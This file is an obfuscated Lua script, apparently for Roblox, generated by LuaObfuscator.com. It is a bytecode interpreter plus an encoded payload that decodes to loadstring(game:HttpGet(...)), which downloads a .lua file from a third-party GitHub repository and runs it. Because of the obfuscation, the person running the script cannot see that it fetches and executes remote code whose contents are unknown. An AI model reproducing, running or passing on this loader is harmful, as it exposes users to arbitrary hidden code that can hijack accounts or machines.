--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v121=0;local v122;while true do if (v121==1) then return v122;end if (v121==0) then v122=v5(v90,v19);v19=nil;v121=1;end end else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0;local v92;while true do if (v91==(0 -(0 + 0))) then v92=(v31/(2^(v32-(2 -1))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((2569 -(1523 + 114)) -(857 + 74)))) ;return v92-(v92%1) ;end end else local v93=2^(v32-(569 -(367 + 201))) ;return (((v31%(v93 + v93))>=v93) and ((834 + 94) -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -(350 -(87 + 263)))) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + ((188 -(67 + 113)) -6) ;v35=118 -(32 + 63 + 22) ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12338840 + (4439373 -(915 + 82)))) + (v41 * (260471 -194935)) + (v40 * (1208 -((2270 -1468) + 150))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (6 -2) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 + 0 ,(9 + 17) -6 ) * ((1189 -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,(37 + 8) -24 ,31);local v48=((v20(v44,6 + 26 )==((773 -(201 + 571)) -0)) and  -1) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 -0)) then return v48 * (18 -(10 + 8)) ;else v47=3 -2 ;v45=(1580 -(116 + 1022)) -(416 + 26) ;end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((432 -(44 + 386))^(1538 -((4154 -3156) + 488))))) ;end local function v25(v49) local v50=0 + 0 ;local v51;local v52;while true do if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=861 -((3854 -3040) + 45) ;end if (((0 + 0) -(0 -0))==v50) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=1 + 0 ;end if (v50==(887 -(261 + 624))) then v52={};for v112=1 -0 , #v51 do v52[v112]=v2(v1(v3(v51,v112,v112)));end v50=1083 -((3456 -2436) + 60) ;end if (v50==(1426 -(630 + 793))) then return v6(v52);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103==(836 -(660 + 176))) then local v119=(function() return 0 + 0 ;end)();while true do if ((202 -(14 + 188))==v119) then v94=(function() return 675 -(534 + 141) ;end)();v95=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end if (v119~=1) then else v103=(function() return 1;end)();break;end end end if (v103==(1 + 0)) then local v120=(function() return 0 + 0 ;end)();while true do if (v120~=(0 -0)) then else while true do if (v94~=0) then else v95=(function() return v96();end)();if (v97(v95, #"/", #"}")~=(0 -0)) then else local v176=(function() return 0;end)();local v177=(function() return;end)();local v178=(function() return;end)();local v179=(function() return;end)();while true do if (3==v176) then if (v97(v178, #"xxx", #"gha")~= #":") then else v179[ #"xnxx"]=(function() return v100[v179[ #"http"]];end)();end v101[v102]=(function() return v179;end)();break;end if (v176==(5 -3)) then if (v97(v178, #"]", #"}")== #"/") then v179[2 + 0 ]=(function() return v100[v179[2]];end)();end if (v97(v178,2,2 + 0 )~= #"[") then else v179[ #"xnx"]=(function() return v100[v179[ #"-19"]];end)();end v176=(function() return 399 -(115 + 281) ;end)();end if (v176==1) then v179=(function() return {v98(),v98(),nil,nil};end)();if (v177==0) then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if ((0 + 0)~=v190) then else v191=(function() return 0 -0 ;end)();while true do if (v191~=(0 -0)) then else v179[ #"xxx"]=(function() return v98();end)();v179[ #"0313"]=(function() return v98();end)();break;end end break;end end elseif (v177== #",") then v179[ #"91("]=(function() return v99();end)();elseif (v177==2) then v179[ #"-19"]=(function() return v99() -(2^16) ;end)();elseif (v177== #"91(") then local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197==(867 -(550 + 317))) then v198=(function() return 0 -0 ;end)();while true do if (v198==0) then v179[ #"xnx"]=(function() return v99() -((2 -0)^(44 -28)) ;end)();v179[ #"?id="]=(function() return v98();end)();break;end end break;end end end v176=(function() return 2;end)();end if (v176==(285 -(134 + 151))) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if ((1665 -(970 + 695))==v185) then v186=(function() return 0;end)();while true do if (v186~=(1 -0)) then else v176=(function() return 1;end)();break;end if (v186==(1990 -(582 + 1408))) then local v194=(function() return 0;end)();while true do if (v194~=(3 -2)) then else v186=(function() return 1 -0 ;end)();break;end if (v194==(0 -0)) then v177=(function() return v97(v95,2, #"xxx");end)();v178=(function() return v97(v95, #".com",6);end)();v194=(function() return 1825 -(1195 + 629) ;end)();end end end end break;end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v54=(function() return function(v104,v105,v106) local v107=(function() return 0 -0 ;end)();local v108=(function() return;end)();while true do if (v107==0) then v108=(function() return 241 -(187 + 54) ;end)();while true do if (v108==0) then local v124=(function() return 780 -(162 + 618) ;end)();while true do if (v124==(0 + 0)) then v104[v105-#"]" ]=(function() return v106();end)();return v104,v105,v106;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #",",v59 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(1 -0)) then v72=(function() return nil;end)();while true do if (v70~=(1 -0)) then else if (v71== #":") then v72=(function() return v21()~=0 ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"-19") then else v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end if (v70==(0 + 0)) then v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end end break;end if (v69==(1636 -(1373 + 263))) then local v114=(function() return 1000 -(451 + 549) ;end)();while true do if ((1 + 0)==v114) then v69=(function() return 1;end)();break;end if (v114~=(0 -0)) then else v70=(function() return 0;end)();v71=(function() return nil;end)();v114=(function() return 1;end)();end end end end end v58[ #"xnx"]=(function() return v21();end)();for v73= #"~",v23() do FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v60,v55,v73=(function() return v53(FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v60,v55,v73);end)();end for v74= #" ",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[414 -(15 + 398) ];local v66=v62[2 -0 ];local v67=v62[1387 -(746 + 638) ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(342 -(218 + 123)) ;local v84={};local v85={};for v109=1581 -(1535 + 46) ,v83 do if (v109>=v77) then v81[v109-v77 ]=v82[v109 + 1 + 0 ];else v85[v109]=v82[v109 + (3 -2) ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if (v88<=(563 -(306 + 254))) then if ((v88<=(1 + 0 + 0)) or (4795<1407)) then if ((1853<4813) and (v88>(0 -0))) then local v125=v87[1469 -(899 + 568) ];local v126=v85[v87[3]];v85[v125 + 1 + 0 ]=v126;v85[v125]=v126[v87[9 -5 ]];else local v130=603 -(268 + 335) ;local v131;while true do if (v130==(290 -(60 + 230))) then v131=v87[(362 + 212) -(426 + 146) ];v85[v131]=v85[v131](v13(v85,v131 + 1 + 0 ,v80));break;end end end elseif ((v88==(1458 -(282 + 1174))) or (2821<2431)) then v85[v87[813 -(569 + 242) ]]();else local v132=0 -0 ;local v133;local v134;local v135;local v136;local v137;while true do if (v132==7) then v87=v75[v79];v137=v87[1 + (851 -(20 + 830)) ];v85[v137]=v85[v137](v13(v85,v137 + (1025 -(706 + 318)) ,v80));v79=v79 + ((978 + 274) -(721 + 530)) ;v132=1279 -(945 + 326) ;end if ((v132==(9 -5)) or (2874<2181)) then v85[v137]=v136[v87[4 + 0 ]];v79=v79 + (701 -(271 + 429)) ;v87=v75[v79];v85[v87[2 + (126 -(116 + 10)) ]]=v87[1503 -(1408 + 92) ];v132=5;end if (v132==(1086 -(35 + 426 + 625))) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v132=1289 -(993 + 295) ;end if (v132==(1 + (738 -(542 + 196)))) then v85[v87[(2514 -1341) -(123 + 295 + 753) ]]={};v79=v79 + 1 ;v87=v75[v79];v85[v87[1 + 1 ]]=v64[v87[1 + 0 + 2 ]];v132=1 + 0 + 1 ;end if (v132==(2 + 4)) then v80=(v135 + v137) -1 ;v133=529 -(406 + 123) ;for v174=v137,v80 do local v175=1769 -(1749 + 20) ;while true do if ((v175==(0 + 0)) or (2689<=343)) then v133=v133 + (1323 -(1249 + 73)) ;v85[v174]=v134[v133];break;end end end v79=v79 + 1 + 0 ;v132=7;end if ((v132==(1150 -(466 + 679))) or (1869==2009)) then v79=v79 + (2 -(2 -1)) ;v87=v75[v79];v137=v87[2];v134,v135=v78(v85[v137](v13(v85,v137 + 1 ,v87[8 -5 ])));v132=6;end if ((v132==(1903 -(106 + 1794))) or (3546<2322)) then v87=v75[v79];v137=v87[1 + 1 ];v136=v85[v87[1 + 2 ]];v85[v137 + (2 -1) ]=v136;v132=10 -6 ;end if ((v132==(116 -(4 + 110))) or (2082==4773)) then v79=v79 + 1 ;v87=v75[v79];v85[v87[586 -(57 + 527) ]]=v64[v87[(3666 -2236) -(41 + 1386) ]];v79=v79 + (104 -(17 + 86)) ;v132=3;end if (v132==(6 + 2)) then v87=v75[v79];v85[v87[3 -1 ]]();v79=v79 + (2 -1) ;v87=v75[v79];v132=175 -(122 + 44) ;end if (v132==(15 -6)) then do return;end break;end end end elseif (v88<=(16 -11)) then if ((3244>1055) and (v88>4)) then v85[v87[2 + 0 ]]=v87[(1552 -(1126 + 425)) + 2 ];else do return;end end elseif (v88<=(411 -(118 + 287))) then v85[v87[3 -1 ]]={};elseif (v88>(72 -(30 + 35))) then local v141=v87[2 + 0 ];local v142,v143=v78(v85[v141](v13(v85,v141 + (1258 -(1043 + 214)) ,v87[11 -8 ])));v80=(v143 + v141) -(3 -2) ;local v144=0;for v172=v141,v80 do local v173=1212 -(323 + 889) ;while true do if ((v173==(0 -0)) or (3313<=1778)) then v144=v144 + (581 -(361 + 219)) ;v85[v172]=v142[v144];break;end end end else v85[v87[2]]=v64[v87[(1444 -(118 + 1003)) -(53 + 267) ]];end v79=v79 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F61726B6F736F6369616C732F61726B6F2Q3233302E746F702F6D61696E2F766330753968316C38772E6C756100094Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
